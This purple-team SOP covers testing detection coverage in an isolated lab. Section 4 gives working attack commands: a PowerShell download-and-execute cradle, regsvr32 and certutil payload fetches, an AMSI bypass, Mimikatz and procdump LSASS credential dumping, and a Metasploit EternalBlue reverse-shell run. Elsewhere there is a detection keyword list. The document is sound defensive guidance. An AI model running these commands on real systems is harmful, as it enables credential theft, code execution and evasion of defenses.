# Detection & Evasion Testing SOP (Purple Team)

**Purpose**: Validate detection coverage by simulating adversary techniques in a controlled environment. Test both detection capabilities (blue team) and evasion techniques (red team) to improve security posture.

**Lab Only**: Never test evasion techniques in production without explicit authorization and coordination.

## Table of Contents

- 1. Pre-Engagement & Authorization
- 2. Threat Intelligence & Hypothesis Development
- 3. Test Planning & Scenario Design
- 4. Adversary Simulation Tools & Techniques
- 5. Execution & Monitoring
- 6. Analysis & Gap Identification
- 7. Reporting & Improvement
- 8. Safety & Legal
- 9. Tools Reference
- 10. Common Pitfalls
- Related SOPs

## 1. Pre-Engagement & Authorization

### Authorization Requirements

**Mandatory Approvals**:
- Written authorization from CISO/Security Leadership
- IT Operations approval (lab infrastructure usage)
- SOC/Incident Response team briefing and consent
- Legal review (if applicable)
- Change control board approval (if required)

**Scope Definition** (the authorization must include):
- Test environment boundaries (specific systems/networks)
- Allowed techniques and tools
- Testing timeframe and schedule
- Halt criteria and escalation procedures
- Authorized testers (names and contact info)
- Success/failure criteria

### Lab Environment Requirements

**Isolated Test Environment**:

```text
# Infrastructure requirements:
1. Isolated network segment (no production connectivity)
2. Dedicated test systems (VMs preferred for snapshots)
3. Separate telemetry pipeline (non-production SIEM/EDR)
4. Snapshot capability for rapid rollback
5. Representative configuration (mirrors production controls)

# Network isolation verification:
- Firewall rules blocking production access
- Air-gapped or dedicated VLAN
- Separate Active Directory domain (if applicable)
- Test accounts only (no production credentials)
```

**Pre-Test Checklist**:
- [ ] Baseline snapshots created for all test systems
- [ ] Monitoring/logging confirmed operational
- [ ] Test accounts created and validated
- [ ] SOC notified of test window
- [ ] Rollback procedures documented and tested
- [ ] Communication channels established (Slack, Teams, etc.)
- [ ] Halt signal defined (safe word, email, emergency contact)

## 2. Threat Intelligence & Hypothesis Development

### Threat Modeling

**Identify Threat Actors Relevant to the Organization**:
- APT groups targeting your industry (financial, healthcare, energy, etc.)
- Commodity malware and ransomware families
- Insider threats (malicious and negligent)
- Supply chain attack vectors

**MITRE ATT&CK Framework Mapping**:

Select tactics/techniques to test based on:
1. Threat intelligence (active campaigns targeting your sector)
2. Recent incidents or near-misses
3. Control gaps identified in prior assessments
4. New detection capabilities being validated

**Example Focus Areas**:
- **Initial Access**: Phishing, exploiting public-facing apps
- **Execution**: PowerShell, WMI, scheduled tasks
- **Persistence**: Registry run keys, services, scheduled tasks
- **Privilege Escalation**: UAC bypass, token manipulation
- **Defense Evasion**: Obfuscation, process injection, AMSI bypass
- **Credential Access**: Credential dumping, Kerberoasting
- **Discovery**: Network scanning, user enumeration
- **Lateral Movement**: Pass-the-Hash, RDP, PsExec
- **Collection**: Screen capture, clipboard data
- **Exfiltration**: C2 channels, DNS tunneling

### Hypothesis Formulation

**Detection Hypotheses (Blue Team Perspective)**:

Example hypotheses:
1. "Our EDR will detect PowerShell obfuscation using Base64 encoding"
2. "Sysmon Event ID 10 (Process Access) will capture credential dumping via LSASS"
3. "SIEM correlation rule will alert on multiple failed login attempts followed by success"
4. "Network monitoring will detect C2 beaconing patterns"
5. "File integrity monitoring will alert on unauthorized changes to system binaries"

**Hypothesis Template**:

```text
"When [RED TEAM ACTION], we expect [BLUE TEAM CONTROL] to [DETECT/ALERT/BLOCK] within [TIME THRESHOLD] with [FIDELITY LEVEL]"
```

## 3. Test Planning & Scenario Design

### Control Coverage Matrix

**Map Techniques to Controls**:

| MITRE Technique | Detection Control | Expected Alert | Coverage Gap |
|-----------------|-------------------|----------------|--------------|
| T1059.001 (PowerShell) | EDR + Script Block Logging | High confidence alert | None |
| T1003.001 (LSASS Dump) | Sysmon Event ID 10 + EDR | Critical alert | Memory only |
| T1021.001 (RDP) | Windows Security Event 4624 | Medium alert | No lateral movement correlation |
| T1071.001 (C2 Web) | Proxy logs + NetFlow | Low alert (noise) | Need tuning |

### Success Metrics

**Define Measurable Outcomes**:
- **Detection Rate**: % of techniques detected by at least one control
- **Time to Detect (TTD)**: Median time from execution to alert generation
- **Time to Triage (TTT)**: Time from alert to analyst investigation
- **False Positive Rate**: Alerts generated by benign test activity (as a share of total alerts)
- **Fidelity**: Quality of alert context (high/medium/low confidence)
- **Coverage**: % of ATT&CK matrix covered by active detections

**Example Thresholds**:

```text
Success Criteria:
- Detection Rate: ≥ 80% for critical techniques
- TTD: ≤ 5 minutes for in-memory attacks
- TTT: ≤ 15 minutes during business hours
- False Positive Rate: ≤ 5% of total alerts
- High Fidelity Alerts: ≥ 60% of detections
```
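The metrics and thresholds above, computed from per-technique test records and checked against the success criteria, as an added example that is not part of the original SOP. The record layout, the sample results and their values are constructed for illustration; the technique IDs are the ones used elsewhere in this document.

```python
from statistics import median

# Example thresholds from the SOP's Success Criteria block.
THRESHOLDS = {
    "detection_rate": 0.80,       # >= 80% of critical techniques detected
    "ttd_seconds": 300,           # median TTD <= 5 min for in-memory attacks
    "ttt_seconds": 900,           # median TTT <= 15 min
    "false_positive_rate": 0.05,  # <= 5% of all alerts raised during the test
    "high_fidelity_share": 0.60,  # >= 60% of detections are high fidelity
}
LOWER_IS_BETTER = {"ttd_seconds", "ttt_seconds", "false_positive_rate"}

# Constructed records, one per executed technique. ttd/ttt are seconds from
# execution to alert and from alert to analyst pickup; None when nothing fired.
SAMPLE_RESULTS = [
    {"technique": "T1059.001", "critical": True, "in_memory": True, "detected": True,
     "ttd": 12, "ttt": 480, "fidelity": "high", "alerts": 3, "false_positives": 0},
    {"technique": "T1003.001", "critical": True, "in_memory": True, "detected": True,
     "ttd": 25, "ttt": 600, "fidelity": "high", "alerts": 2, "false_positives": 0},
    {"technique": "T1055.004", "critical": True, "in_memory": True, "detected": False,
     "ttd": None, "ttt": None, "fidelity": None, "alerts": 0, "false_positives": 0},
    {"technique": "T1021.001", "critical": False, "in_memory": False, "detected": True,
     "ttd": 90, "ttt": 1200, "fidelity": "medium", "alerts": 4, "false_positives": 1},
    {"technique": "T1071.001", "critical": True, "in_memory": False, "detected": True,
     "ttd": 400, "ttt": 900, "fidelity": "low", "alerts": 6, "false_positives": 2},
]


def score(results):
    """Compute the Section 3 metrics from per-technique test records."""
    critical = [r for r in results if r["critical"]]
    detected = [r for r in results if r["detected"]]
    in_memory_ttd = [r["ttd"] for r in detected if r["in_memory"]]
    total_alerts = sum(r["alerts"] for r in results)
    false_positives = sum(r["false_positives"] for r in results)
    high = [r for r in detected if r["fidelity"] == "high"]
    return {
        "detection_rate": sum(r["detected"] for r in critical) / len(critical) if critical else 0.0,
        "ttd_seconds": median(in_memory_ttd) if in_memory_ttd else None,
        "ttt_seconds": median(r["ttt"] for r in detected) if detected else None,
        "false_positive_rate": false_positives / total_alerts if total_alerts else 0.0,
        "high_fidelity_share": len(high) / len(detected) if detected else 0.0,
    }


def evaluate(metrics, thresholds=THRESHOLDS):
    """Map each metric to True (meets threshold), False (misses) or None (no data)."""
    verdict = {}
    for name, limit in thresholds.items():
        value = metrics[name]
        if value is None:
            verdict[name] = None
        elif name in LOWER_IS_BETTER:
            verdict[name] = value <= limit
        else:
            verdict[name] = value >= limit
    return verdict
```

With the sample data the detection rate (3 of 4 critical techniques), the false positive rate and the high-fidelity share all miss their thresholds, which is the kind of result that feeds the gap analysis in Section 6.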

### Test Scenarios

**Scenario Template**:

```markdown
## Scenario: Credential Dumping via Mimikatz

**Objective**: Validate detection of credential theft

**MITRE Techniques**:
- T1003.001 (LSASS Memory Dump)
- T1003.002 (Security Account Manager)

**Expected Detections**:
1. EDR behavioral detection (process injection into LSASS)
2. Sysmon Event ID 10 (ProcessAccess to lsass.exe)
3. SIEM correlation (suspicious process + LSASS access + privilege token use)

**Execution Steps**:
1. Launch Mimikatz from test directory
2. Execute: `sekurlsa::logonpasswords`
3. Document alerts generated
4. Verify credential hashes NOT exported (benign test only)

**Cleanup**:
- Terminate Mimikatz process
- Delete test artifacts
- Restore snapshot if persistence was tested
```

## 4. Adversary Simulation Tools & Techniques

### Red Team Testing Frameworks

**MITRE Caldera**:

```bash
# Automated adversary emulation platform
# https://github.com/mitre/caldera

# Install (plugins are git submodules, so clone recursively)
git clone https://github.com/mitre/caldera.git --recursive
cd caldera
pip install -r requirements.txt
python server.py

# Access: http://localhost:8888
# Select adversary profile (e.g., APT29, APT3)
# Deploy agent to test system
# Execute operation and observe detections
```

**Atomic Red Team**:

```powershell
# Atomic tests for ATT&CK techniques
# https://github.com/redcanaryco/atomic-red-team

# Install
Install-Module -Name invoke-atomicredteam
# Import
Import-Module invoke-atomicredteam

# List techniques
Get-AtomicTechnique

# Execute specific test
Invoke-AtomicTest T1059.001   # PowerShell execution

# Execute with parameters
Invoke-AtomicTest T1003.001 -TestGuids "a96872b2-cbf3-46cf-8eb4-27e8c0e85660"

# Cleanup after test
Invoke-AtomicTest T1059.001 -Cleanup
```

**Infection Monkey**:

```text
# Automated lateral movement and network propagation testing
# https://www.guardicore.com/infectionmonkey/

# Deploy in isolated network
# Configure targets (test systems only)
# Select attack techniques
# Execute and monitor propagation
# Review telemetry in dashboard
```

**Cobalt Strike (Commercial)**:

C2 framework for red team operations. Use only with proper licensing and authorization.

Features:
- Beacon implant deployment
- Process injection techniques
- Lateral movement via PsExec, WMI, SSH
- Credential harvesting
- Evasion capabilities (malleable C2, AMSI bypass)

Purple team use:
- Test detection of C2 beacons
- Validate network monitoring (JA3, DNS, HTTP patterns)
- Test EDR behavioral detections

**Metasploit Framework**:

```bash
# Open-source penetration testing framework
msfconsole

# Example: Test SMB exploit detection (lab addresses)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit

# Verify detection of:
# - Network scan (Nmap/Metasploit pre-exploitation)
# - SMB exploit attempt
# - Reverse shell connection
# - Meterpreter process injection
```

### Specific Evasion Techniques to Test

**1. PowerShell Obfuscation**:

```powershell
# Base64 encoding
$command = "Write-Host 'Test Detection'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
powershell.exe -encodedCommand $encoded

# String concatenation
$c1 = "Write"
$c2 = "-Host"
$c3 = "'Evade Detection'"
IEX "$c1$c2 $c3"

# Invoke-Expression with download
IEX (New-Object Net.WebClient).DownloadString('http://test-server/script.ps1')

# Expected Detections:
# - Script Block Logging (Event ID 4104)
# - Module Logging (Event ID 4103)
# - EDR behavioral detection (suspicious script execution)
```

**2. LOLBins (Living Off the Land Binaries)**:

```cmd
:: MSBuild.exe (code execution)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe malicious.csproj

:: Regsvr32.exe (COM scriptlet execution)
regsvr32 /s /n /u /i:http://test-server/test.sct scrobj.dll

:: CertUtil (file download)
certutil -urlcache -split -f http://test-server/payload.exe payload.exe

:: Expected Detections:
:: - Process creation from unusual parent (Sysmon Event ID 1)
:: - Network connection from unexpected binary (Sysmon Event ID 3)
:: - Command-line logging showing suspicious parameters
```

**3. Process Injection**:

```text
# DLL Injection
# CreateRemoteThread API → inject DLL into target process

# Process Hollowing
# Create suspended process → replace memory → resume

# Reflective DLL Injection
# Load DLL directly into memory (no disk artifacts)

# Expected Detections:
# - Sysmon Event ID 8 (CreateRemoteThread)
# - Sysmon Event ID 10 (ProcessAccess with suspicious rights)
# - EDR behavioral detection (memory allocation patterns)
```

**4. AMSI Bypass**:

```powershell
# AMSI (Anti-Malware Scan Interface) bypass techniques

# Reflection-based bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Expected Detections:
# - Script Block Logging (full script content)
# - EDR monitoring of AMSI tampering
# - Memory scanning for known bypass patterns
```

**5. Credential Dumping**:

```text
# Mimikatz
mimikatz.exe "sekurlsa::logonpasswords" "exit"

# Impacket secretsdump
secretsdump.py -sam sam.save -system system.save LOCAL

# ProcDump + Mimikatz (two-stage)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Transfer lsass.dmp offline, analyze with Mimikatz

# Expected Detections:
# - Sysmon Event ID 10 (ProcessAccess to lsass.exe)
# - EDR behavioral (credential access pattern)
# - Security Event 4656 (handle to LSASS)
```

## 5. Execution & Monitoring

### Execution Protocol

**Pre-Execution**:

```text
# 1. Verify test environment isolation
ping production-server.example.com   # Should fail (a blocked ping alone is not proof of isolation; confirm the firewall rules too)

# 2. Confirm monitoring is active
# Check SIEM/EDR console for heartbeat from test systems

# 3. Notify SOC via designated channel
"Purple Team Test START - Scenario: [NAME] - Expected Duration: [TIME]"

# 4. Start packet capture (if network testing)
tcpdump -i eth0 -w test_capture.pcap

# 5. Document baseline state
Get-Process > pre_test_processes.txt   # Windows
ps aux > pre_test_processes.txt        # Linux
```

**During Execution**:

```powershell
# Execute technique with detailed logging
# Example: PowerShell with transcript
Start-Transcript -Path C:\Logs\purple_team_test.log
# [Execute test technique]
Stop-Transcript

# Monitor for alerts in real-time
# - SIEM dashboard
# - EDR console
# - Email/Slack notifications
```

Document observations:
- Time of execution (UTC)
- Command/tool used
- Alerts generated (alert ID, rule name, timestamp)
- False positives triggered
- Detection gaps (no alert when expected)

**Post-Execution**:

```powershell
# 1. Execute cleanup procedures
Remove-Item C:\Temp\test_payload.exe
Remove-Item HKCU:\Software\Test\PersistenceKey

# 2. Verify cleanup
Get-ChildItem C:\Temp\test_*   # Should return nothing

# 3. Collect telemetry
# Export SIEM alerts for test window
# Export EDR events for test endpoints
# Save packet capture

# 4. Notify SOC of test completion
"Purple Team Test END - Scenario: [NAME] - Review alerts and provide feedback"

# 5. Restore snapshot if destructive testing occurred
# VMware: Revert to snapshot "pre_purple_test"
# Hyper-V: Apply checkpoint
```

### Data Collection

**Telemetry Sources to Review**:

```powershell
# Windows Event Logs
wevtutil epl Security C:\Logs\Security_test.evtx
wevtutil epl System C:\Logs\System_test.evtx
wevtutil epl "Microsoft-Windows-Sysmon/Operational" C:\Logs\Sysmon_test.evtx
wevtutil epl "Microsoft-Windows-PowerShell/Operational" C:\Logs\PowerShell_test.evtx
```

```bash
# Linux Logs
cp /var/log/syslog /evidence/syslog_test.txt
cp /var/log/auth.log /evidence/auth_test.txt
journalctl --since "2025-10-05 14:00:00" --until "2025-10-05 15:00:00" > journalctl_test.txt
```

EDR/SIEM exports:
- Export alerts matching the test timeframe
- Export raw events from test endpoints
- Document the query used and the export format

## 6. Analysis & Gap Identification

### Detection Coverage Analysis

**For Each Tested Technique**:

```markdown
## Technique: T1059.001 (PowerShell)

**Test Executed**: Base64-encoded PowerShell command
**Command**: `powershell.exe -encodedCommand [BASE64]`
**Timestamp**: 2025-10-05 14:32:15 UTC

**Detection Results**:

✅ **Detected by**:
- EDR: Alert "Suspicious PowerShell Execution" (High confidence)
- Sysmon: Event ID 1 (Process Creation) logged command line
- PowerShell Script Block Logging: Event ID 4104 captured decoded script

❌ **Missed by**:
- SIEM correlation rule (no alert generated)
- Network monitoring (no DNS/HTTP activity to correlate)

**Detection Quality**:
- TTD (Time to Detect): 12 seconds
- TTT (Time to Triage): 8 minutes (analyst reviewed alert)
- Fidelity: High (low false positive history for this rule)
- Context: Full command line captured, parent process identified

**Gap Analysis**:
- SIEM rule not tuned for encoded PowerShell (only checks for the literal "-encodedCommand" flag)
- No correlation with user behavior analytics (was this user expected to run PowerShell?)

**Recommendations**:
1. Update SIEM rule to decode Base64 and search for known malicious patterns
2. Implement UBA baseline for PowerShell usage per user/role
3. Alert on PowerShell from unusual parent processes (Word, Excel, etc.)
```
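One way to act on recommendation 1 from the gap analysis, as an added example that is not code from the original SOP: decode the -EncodedCommand payload from a process-creation command line and scan it, treating every spelling of the switch that powershell.exe accepts the same way. The indicator list and the sample command lines are assumptions constructed for the demonstration.

```python
import base64
import binascii
import re

# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) plus
# the alias -ec, so a rule that only matches the literal "-encodedCommand" misses
# most real invocations. Capture "<switch> <base64 token>" pairs and compare the
# switch against the full parameter name instead.
FLAG_RE = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")

# Decoded-script content worth an alert. Assumed starter list with plain
# substring matching for illustration; tune per environment.
INDICATORS = ("invoke-expression", "iex", "downloadstring", "net.webclient",
              "frombase64string", "amsiutils", "-bxor")


def encode_ps(script):
    """Build an -EncodedCommand argument the way the SOP's test does (UTF-16LE + Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_command_line(cmdline):
    """Return {'encoded', 'decoded', 'indicators', 'suspicious'} for one command line."""
    result = {"encoded": False, "decoded": None, "indicators": [], "suspicious": False}
    for match in FLAG_RE.finditer(cmdline):
        switch, value = match.group(1).lower(), match.group(2)
        if switch != "ec" and not "encodedcommand".startswith(switch):
            continue  # some other switch, e.g. -ExecutionPolicy, -File, -w
        result["encoded"] = True
        try:
            raw = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            # Not valid Base64: powershell.exe would reject it, but an analyst should still look.
            result["indicators"].append("undecodable-payload")
            break
        result["decoded"] = raw.decode("utf-16-le", errors="replace")
        lowered = result["decoded"].lower()
        result["indicators"].extend(i for i in INDICATORS if i in lowered)
        break
    result["suspicious"] = bool(result["indicators"])
    return result


# Constructed command lines as they would appear in Sysmon Event ID 1 / Security 4688.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -encodedCommand " + encode_ps("Write-Host 'Test Detection'"),
    "powershell.exe -nop -w hidden -enc " + encode_ps(
        "IEX (New-Object Net.WebClient).DownloadString('http://test-server/script.ps1')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
]
```

The first sample is the SOP's own benign test and decodes cleanly without indicators; the second is the download cradle from Section 4 behind the short -enc switch, which a literal "-encodedCommand" match would never see.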

### False Positive Analysis

**Document Benign Activity Triggering Alerts**:

False positive example:
- **Alert**: "Credential Access via Registry"
- **Trigger**: Legitimate backup software reading the SAM hive
- **Root Cause**: Rule too broad (any registry access to SAM/SECURITY)
- **Recommendation**: Add an exception for the backup process (signed binary, expected schedule)
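The recommended exception applied to the broad rule, as an added example that is not part of the original SOP: the backup process is excluded only when its path, its signer and the backup schedule all match, so a renamed, unsigned or off-schedule copy still alerts. Vendor name, path, signer, window and the event records are constructed for illustration.

```python
from datetime import datetime, time

# Allowlist for the backup agent from the example above. The exception keys on
# a signed binary at a fixed path during the nightly backup window, never on
# the file name alone. Vendor, path, signer and window are assumed values.
BACKUP_EXCEPTION = {
    "image": r"C:\Program Files\BackupVendor\backupagent.exe",
    "signer": "BackupVendor Inc.",
    "window": (time(1, 0), time(3, 0)),
}
PROTECTED_HIVES = (r"\REGISTRY\MACHINE\SAM", r"\REGISTRY\MACHINE\SECURITY")


def touches_protected_hive(event):
    """The broad rule as written: any registry access under the SAM or SECURITY hive."""
    obj = event["object"].upper()
    return event["event_id"] == 4663 and any(
        obj == hive or obj.startswith(hive + "\\") for hive in PROTECTED_HIVES)


def matches_backup_exception(event, exc=BACKUP_EXCEPTION):
    """All conditions must hold together; a renamed, unsigned or off-schedule copy still alerts."""
    start, end = exc["window"]
    at = datetime.fromisoformat(event["timestamp"]).time()
    return (event["image"].lower() == exc["image"].lower()
            and event["signed"] and event["signer"] == exc["signer"]
            and start <= at <= end)


def should_alert(event):
    return touches_protected_hive(event) and not matches_backup_exception(event)


def make_event(obj, image, signed, signer, ts):
    """Minimal Security 4663-style record (constructed shape, not a real log schema)."""
    return {"event_id": 4663, "object": obj, "image": image,
            "signed": signed, "signer": signer, "timestamp": ts}


AGENT = BACKUP_EXCEPTION["image"]
SAM = r"\REGISTRY\MACHINE\SAM\SAM\Domains"
SAMPLE_EVENTS = {
    "backup_in_window": make_event(SAM, AGENT, True, "BackupVendor Inc.", "2025-10-05T02:15:00"),
    "backup_off_schedule": make_event(SAM, AGENT, True, "BackupVendor Inc.", "2025-10-05T14:32:00"),
    "renamed_unsigned_copy": make_event(SAM, r"C:\Users\Public\backupagent.exe", False, None,
                                        "2025-10-05T02:20:00"),
    "reg_exe_security_hive": make_event(r"\REGISTRY\MACHINE\SECURITY", r"C:\Windows\System32\reg.exe",
                                        True, "Microsoft Windows", "2025-10-05T02:30:00"),
    "unrelated_key": make_event(r"\REGISTRY\MACHINE\SOFTWARE\BackupVendor", AGENT, True,
                                "BackupVendor Inc.", "2025-10-05T02:10:00"),
}
```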

### Evasion Success Tracking

**If a Technique Evaded Detection**:

```markdown
## Evasion Success: Process Injection via QueueUserAPC

**Technique**: T1055.004 (Asynchronous Procedure Call)
**Tool**: Custom injector

**Why Detection Failed**:
1. EDR heuristics did not flag QueueUserAPC API call
2. Sysmon Event ID 8 (CreateRemoteThread) not triggered (different injection method)
3. No memory scanning at time of injection

**Exploit Conditions**:
- Unsigned injector binary
- Injection into legitimate process (explorer.exe)
- No network activity post-injection (stayed dormant)

**Remediation**:
- Implement ETW (Event Tracing for Windows) monitoring for thread creation APIs
- Add memory scanning on suspicious process access events
- Deploy YARA rules to detect injection frameworks
```

## 7. Reporting & Improvement

### Executive Summary Template

```markdown
# Purple Team Exercise Report

**Date**: 2025-10-05
**Duration**: 4 hours
**Participants**: Red Team (3), Blue Team (5), SOC (2)

## Objectives
Validate detection coverage for credential access and lateral movement techniques used by APT29.

## Summary
- **Techniques Tested**: 12
- **Techniques Detected**: 9 (75%)
- **High-Fidelity Alerts**: 7 (78%)
- **False Positives**: 3
- **Critical Gaps**: 3 (privilege escalation, evasion, persistence)

## Key Findings

✅ **Strengths**:
- PowerShell logging and EDR provide excellent coverage
- Lateral movement via RDP detected consistently
- Credential dumping from LSASS detected in < 30 seconds

❌ **Weaknesses**:
- Process injection techniques evaded EDR behavioral detection
- LOLBins (MSBuild, Regsvr32) not monitored
- C2 beaconing patterns not correlated in SIEM

## Recommendations
1. **Immediate**: Deploy Sysmon config update for process injection monitoring
2. **Short-term** (30 days): Implement LOLBin detection rules (Sigma/Splunk)
3. **Long-term** (90 days): Enhance C2 detection with JA3 fingerprinting and beaconing analysis
```

### Improvement Tracking

**Action Items with Owners**:

| Priority | Finding | Recommended Action | Owner | Due Date | Status |
|----------|---------|-------------------|-------|----------|--------|
| P1 | Process injection not detected | Deploy Sysmon config v15 | SecOps | 2025-10-12 | In Progress |
| P1 | MSBuild execution not alerted | Create SIEM rule for LOLBins | SOC Lead | 2025-10-15 | Pending |
| P2 | C2 beaconing not correlated | Implement JA3/JA3S monitoring | NetSec | 2025-11-01 | Planning |
| P3 | UBA not detecting anomalous PowerShell | Tune UBA baseline for PowerShell | SIEM Admin | 2025-12-01 | Backlog |

## 8. Safety & Legal

### Safety Protocols

**❌ Never**:
- Test in production without isolated telemetry
- Use real malware or exploit kits
- Exfiltrate actual sensitive data
- Perform denial of service attacks
- Pivot beyond authorized scope
- Test without SOC coordination

**✅ Always**:
- Use benign simulators (Atomic Red Team, Caldera)
- Maintain rollback capability (snapshots)
- Coordinate timing with SOC
- Document every action with timestamps
- Verify isolation before execution
- Stop immediately on unexpected behavior

### Legal Considerations

**Authorization Documentation**:
- Signed approval from CISO/CIO
- Scope clearly defined and acknowledged
- Indemnification (if external red team involved)
- NDA/confidentiality agreements
- Safe harbor clause for good-faith testing

**Compliance**:
- No violations of the Computer Fraud and Abuse Act (CFAA)
- Respect organizational acceptable use policies
- No testing of third-party services without consent
- Proper handling of any discovered vulnerabilities

## 9. Tools Reference

| Tool | Purpose | Link |
|---|---|---|
| **Red Team Frameworks** | | |
| Atomic Red Team | Technique-specific tests | github.com/redcanaryco/atomic-red-team |
| MITRE Caldera | Automated adversary emulation | github.com/mitre/caldera |
| Infection Monkey | Lateral movement testing | guardicore.com/infectionmonkey |
| Cobalt Strike | C2 framework (commercial) | cobaltstrike.com |
| Metasploit | Exploitation framework | metasploit.com |
| **Detection Tools** | | |
| Sysmon | Windows event logging | docs.microsoft.com/sysinternals |
| Sigma | Generic detection rules | github.com/SigmaHQ/sigma |
| YARA | Pattern matching | virustotal.github.io/yara |
| **Analysis** | | |
| ATT&CK Navigator | Technique coverage mapping | mitre-attack.github.io/attack-navigator |
| DeTT&CT | Detection coverage scoring | github.com/rabobank-cdc/DeTTECT |

## 10. Common Pitfalls

- ❌ Testing without proper authorization (legal risk)
- ❌ Using production systems (availability/integrity risk)
- ❌ Not coordinating with SOC (alert fatigue, missed detections)
- ❌ Forgetting cleanup procedures (persistence artifacts remain)
- ❌ Not documenting methodology (can't reproduce results)
- ❌ Testing too many techniques at once (difficult to correlate)
- ❌ Ignoring false positives (alert tuning opportunity missed)
- ❌ Not retesting after remediation (validate fixes)
- ❌ Poor communication (red/blue team siloed)
- ❌ Treating this as red team vs. blue team (collaborative improvement, not competition)

## Related SOPs

**Analysis**:
- Reverse Engineering: Analyzing evasion techniques in binaries
- Cryptography Analysis: Encryption-based evasion methods
- Malware Analysis: Malware evasion technique analysis

**Pentesting & Security**:
- Active Directory Pentesting: AD-specific evasion techniques
- Linux Pentesting: Linux evasion and anti-forensics
- Web Application Security: WAF and IDS/IPS bypass
- Mobile Security: Mobile platform evasion techniques
- Vulnerability Research: Testing exploit detection
- Bug Bounty Hunting: Understanding detection evasion for responsible disclosure
- Forensics Investigation: Testing anti-forensics effectiveness